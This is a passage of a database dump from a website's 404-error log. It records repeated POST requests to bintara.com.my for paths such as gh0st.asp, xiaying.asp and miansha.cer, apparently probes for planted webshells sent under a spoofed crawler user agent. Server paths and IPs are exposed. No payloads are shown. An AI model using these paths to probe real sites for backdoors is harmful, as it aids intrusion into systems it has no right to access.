Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"210.52.177.163\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"210.52.177.163\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/images/xiaying.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/images/xiaying.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@-Nq6CYj3S7An3VFFdNgAAAUE\";s:12:\"REDIRECT_URL\";s:19:\"/images/xiaying.asp\";s:11:\"REMOTE_ADDR\";s:13:\"218.88.204.80\";s:11:\"REMOTE_PORT\";s:5:\"49630\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/images/xiaying.asp\";s:10:\"SCRIPT_URL\";s:19:\"/images/xiaying.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa@-Nq6CYj3S7An3VFFdNgAAAUE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571798838.1393\";s:12:\"REQUEST_TIME\";s:10:\"1571798838\";}}','notice','2019-10-23 02:47:20','2019-10-23 02:47:18',35338992,37143072,'http://bintara.com.my//images/xiaying.asp',1,0,'210.52.177.163'),(28751,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"//templates/gh0st.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"202.118.72.124\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"202.118.72.124\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/templates/gh0st.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/templates/gh0st.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@-Q@4vBmywCERyagfmsAAAAQQ\";s:12:\"REDIRECT_URL\";s:20:\"/templates/gh0st.asp\";s:11:\"REMOTE_ADDR\";s:13:\"218.88.204.80\";s:11:\"REMOTE_PORT\";s:5:\"50255\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/templates/gh0st.asp\";s:10:\"SCRIPT_URL\";s:20:\"/templates/gh0st.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa@-Q@4vBmywCERyagfmsAAAAQQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571798851.2533\";s:12:\"REQUEST_TIME\";s:10:\"1571798851\";}}','notice','2019-10-23 02:47:33','2019-10-23 02:47:31',35342336,37140720,'http://bintara.com.my//templates/gh0st.asp',1,0,'202.118.72.124'),(28752,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"//templates/gh0st.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"222.62.42.108\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"222.62.42.108\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/templates/gh0st.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/templates/gh0st.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@-UiGcwml6EYyVWZHRJwAAAJM\";s:12:\"REDIRECT_URL\";s:20:\"/templates/gh0st.asp\";s:11:\"REMOTE_ADDR\";s:13:\"218.88.204.80\";s:11:\"REMOTE_PORT\";s:5:\"50712\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/templates/gh0st.asp\";s:10:\"SCRIPT_URL\";s:20:\"/templates/gh0st.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa@-UiGcwml6EYyVWZHRJwAAAJM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571798867.0934\";s:12:\"REQUEST_TIME\";s:10:\"1571798867\";}}','notice','2019-10-23 02:47:49','2019-10-23 02:47:47',35267336,37070896,'http://bintara.com.my//templates/gh0st.asp',1,0,'222.62.42.108'),(28753,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//image/gangbi.ASp\";s:14:\"CONTENT_LENGTH\";s:3:\"400\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"61.133.252.232\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"61.133.252.232\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/image/gangbi.ASp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/image/gangbi.ASp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@-YOHARMCuuKQiJT-zxQAAAM4\";s:12:\"REDIRECT_URL\";s:17:\"/image/gangbi.ASp\";s:11:\"REMOTE_ADDR\";s:13:\"218.88.204.80\";s:11:\"REMOTE_PORT\";s:5:\"51132\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/image/gangbi.ASp\";s:10:\"SCRIPT_URL\";s:17:\"/image/gangbi.ASp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa@-YOHARMCuuKQiJT-zxQAAAM4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571798880.5967\";s:12:\"REQUEST_TIME\";s:10:\"1571798880\";}}','notice','2019-10-23 02:48:04','2019-10-23 02:48:01',35267624,37075280,'http://bintara.com.my//image/gangbi.ASp',1,0,'61.133.252.232'),(28754,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//image/gangbi.ASp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"61.159.9.218\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"61.159.9.218\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/image/gangbi.ASp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/image/gangbi.ASp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@-bCGcwml6EYyVWZHRKgAAAJU\";s:12:\"REDIRECT_URL\";s:17:\"/image/gangbi.ASp\";s:11:\"REMOTE_ADDR\";s:13:\"218.88.204.80\";s:11:\"REMOTE_PORT\";s:5:\"51491\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/image/gangbi.ASp\";s:10:\"SCRIPT_URL\";s:17:\"/image/gangbi.ASp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa@-bCGcwml6EYyVWZHRKgAAAJU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571798892.7459\";s:12:\"REQUEST_TIME\";s:10:\"1571798892\";}}','notice','2019-10-23 02:48:15','2019-10-23 02:48:13',35272184,37071896,'http://bintara.com.my//image/gangbi.ASp',1,0,'61.159.9.218'),(28755,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"//Include/showpag.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"202.97.22.242\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"202.97.22.242\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/Include/showpag.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/Include/showpag.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-AGK6CYj3S7An3VFFeXwAAAVA\";s:12:\"REDIRECT_URL\";s:20:\"/Include/showpag.asp\";s:11:\"REMOTE_ADDR\";s:13:\"218.88.204.80\";s:11:\"REMOTE_PORT\";s:5:\"55767\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/Include/showpag.asp\";s:10:\"SCRIPT_URL\";s:20:\"/Include/showpag.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-AGK6CYj3S7An3VFFeXwAAAVA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571799064.6488\";s:12:\"REQUEST_TIME\";s:10:\"1571799064\";}}','notice','2019-10-23 02:51:08','2019-10-23 02:51:05',35663600,37463664,'http://bintara.com.my//Include/showpag.asp',1,0,'202.97.22.242'),(28756,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//ask/miansha.cer\";s:14:\"CONTENT_LENGTH\";s:3:\"300\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:11:\"221.7.2.156\";s:20:\"HTTP_X_FORWARDED_FOR\";s:11:\"221.7.2.156\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/ask/miansha.cer\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/ask/miansha.cer\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-AIO4vBmywCERyagfm2QAAARY\";s:12:\"REDIRECT_URL\";s:16:\"/ask/miansha.cer\";s:11:\"REMOTE_ADDR\";s:13:\"218.88.204.80\";s:11:\"REMOTE_PORT\";s:5:\"55924\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/ask/miansha.cer\";s:10:\"SCRIPT_URL\";s:16:\"/ask/miansha.cer\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-AIO4vBmywCERyagfm2QAAARY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571799072.396\";s:12:\"REQUEST_TIME\";s:10:\"1571799072\";}}','notice','2019-10-23 02:51:14','2019-10-23 02:51:12',35269072,37072000,'http://bintara.com.my//ask/miansha.cer',1,0,'221.7.2.156'),(28757,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//ask/miansha.cer\";s:14:\"CONTENT_LENGTH\";s:3:\"685\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:11:\"121.49.0.62\";s:20:\"HTTP_X_FORWARDED_FOR\";s:11:\"121.49.0.62\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/ask/miansha.cer\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/ask/miansha.cer\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-APe4vBmywCERyagfm3gAAAQM\";s:12:\"REDIRECT_URL\";s:16:\"/ask/miansha.cer\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"64063\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/ask/miansha.cer\";s:10:\"SCRIPT_URL\";s:16:\"/ask/miansha.cer\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-APe4vBmywCERyagfm3gAAAQM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571799101.2497\";s:12:\"REQUEST_TIME\";s:10:\"1571799101\";}}','notice','2019-10-23 02:51:43','2019-10-23 02:51:41',35269416,37075992,'http://bintara.com.my//ask/miansha.cer',1,0,'121.49.0.62'),(28758,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//admin/index.php\";s:14:\"CONTENT_LENGTH\";s:3:\"300\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"211.98.180.103\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"211.98.180.103\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/index.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/admin/index.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-AT66CYj3S7An3VFFedgAAAVA\";s:12:\"REDIRECT_URL\";s:16:\"/admin/index.php\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"62736\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/index.php\";s:10:\"SCRIPT_URL\";s:16:\"/admin/index.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-AT66CYj3S7An3VFFedgAAAVA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571799119.6147\";s:12:\"REQUEST_TIME\";s:10:\"1571799119\";}}','notice','2019-10-23 02:52:01','2019-10-23 02:52:00',35265520,37063688,'http://bintara.com.my//admin/index.php',1,0,'211.98.180.103'),(28759,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//admin/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"820\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 